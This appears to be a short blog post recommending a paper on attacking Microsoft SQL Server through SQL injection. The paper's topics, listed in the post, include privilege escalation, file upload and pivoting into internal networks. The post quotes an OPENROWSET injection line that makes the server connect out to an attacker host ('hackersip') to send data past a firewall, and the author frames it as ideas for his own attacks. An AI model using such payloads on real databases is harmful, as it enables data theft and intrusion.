Bending MS SQL Server and Greasing It Up

I just read a great article published by Application Security Inc. which gave me some good ideas for my future SQL Injection attacks. It starts like this :

select * from OPENROWSET(‘SQLoledb’, ‘uid=sa;pwd=;Network=DBMSSOCN;Address=hackersip,80;’, ‘select * from table’)

Well, having the SQL server call home to your machine is cool enough (bye bye firewall) , but the paper’s author, Cesar Cerrudo went a step forward . These are the main topics covered by his paper :

  • Detection of sql injection vulnerabilities
  • Retrieving results from sql injection
  • Elevating privileges
  • Uploading files
  • Getting into the internal network
  • Port scanning
  • Recommendations

I highly recommend Manipulating Microsoft SQL Server Using SQL Injection

Thank you for reading this post. You can now Leave A Comment (0) or Leave A Trackback. Print This Post Print This Post

Subscribe without commenting

Leave a Reply

Note: Any comments are permitted only because the site owner is letting you post, and any comments will be removed for any reason at the absolute discretion of the site owner.

CommentLuv badge